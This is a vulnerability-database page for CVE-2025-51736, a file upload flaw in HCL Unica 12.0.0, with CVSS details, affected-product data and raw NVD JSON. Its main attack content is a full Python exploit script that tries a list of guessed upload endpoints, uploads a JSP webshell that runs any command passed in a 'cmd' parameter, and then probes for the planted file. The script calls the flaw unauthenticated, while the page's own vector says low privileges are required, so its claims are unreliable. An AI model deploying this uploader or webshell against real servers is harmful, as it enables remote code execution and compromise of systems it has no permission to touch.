Security Vulnerability Report
中文
CVE-2025-51736 CVSS 6.3 MEDIUM

CVE-2025-51736

Published: 2025-11-28 15:16:02
Last Modified: 2025-12-02 20:58:33
Source: [email protected]

Description

File upload vulnerability in HCL Technologies Ltd. Unica 12.0.0.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:unica:12.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Unica 12.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-51736 PoC - HCL Unica File Upload Vulnerability # Description: Unauthenticated remote file upload leading to RCE def exploit(target_url, file_content, filename): """ Exploit file upload vulnerability in HCL Unica 12.0.0 Args: target_url: Base URL of vulnerable HCL Unica instance file_content: Malicious file content to upload filename: Name of the file to upload Returns: bool: True if upload successful, False otherwise """ # Common upload endpoints in HCL Unica upload_endpoints = [ "/unica/api/upload", "/unica/j_spring_security_check", "/unica/uploadservlet", "/api/file/upload", "/upload", "/fileupload" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary" } # Construct multipart form data with malicious file boundary = "----WebKitFormBoundary" data = f"""------{boundary}\r Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r Content-Type: application/octet-stream\r {file_content}\r ------{boundary}--\r """ for endpoint in upload_endpoints: try: url = target_url.rstrip('/') + endpoint print(f"[*] Trying upload endpoint: {url}") response = requests.post(url, data=data, headers=headers, timeout=10, verify=False) # Check for successful upload indicators if response.status_code in [200, 201, 204] or "success" in response.text.lower(): print(f"[+] File upload appears successful via {endpoint}") print(f"[+] Response: {response.text[:200]}") # Attempt to access uploaded file access_urls = [ f"{target_url.rstrip('/')}/{filename}", f"{target_url.rstrip('/')}/uploads/{filename}", f"{target_url.rstrip('/')}/files/{filename}" ] for access_url in access_urls: try: check_response = requests.get(access_url, timeout=5, verify=False) if check_response.status_code == 200: print(f"[+] Uploaded file accessible at: {access_url}") return True except: continue return True except requests.exceptions.RequestException as e: print(f"[-] Error with {endpoint}: {str(e)}") continue print("[-] All upload attempts failed") return False def generate_webshell(): """Generate JSP webshell content for RCE""" return """<%@ page import="java.io.*" %> <% String cmd = request.getParameter(\"cmd\"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(in)); StringBuilder sb = new StringBuilder(); String line; while((line = reader.readLine()) != null) { sb.append(line).append(\"\\n\"); } out.println(\"<pre>\" + sb.toString() + \"</pre>\"); } %>""" if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-51736.py <target_url> ") print("Example: python cve-2025-51736.py http://vulnerable-server:9080 shell.jsp") sys.exit(1) target = sys.argv[1] filename = sys.argv[2] print(f"[*] CVE-2025-51736 Exploit - HCL Unica File Upload RCE") print(f"[*] Target: {target}") print(f"[*] Filename: {filename}") # Generate malicious JSP webshell webshell = generate_webshell() # Execute exploit success = exploit(target, webshell, filename) if success: print("[+] Exploitation successful! Access webshell with: ?cmd=whoami") else: print("[-] Exploitation failed - target may not be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-51736", "sourceIdentifier": "[email protected]", "published": "2025-11-28T15:16:01.543", "lastModified": "2025-12-02T20:58:32.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File upload vulnerability in HCL Technologies Ltd. Unica 12.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica:12.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7E79CAB-2508-4CBD-A075-BEEE2B503C30"}]}]}], "references": [{"url": "https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.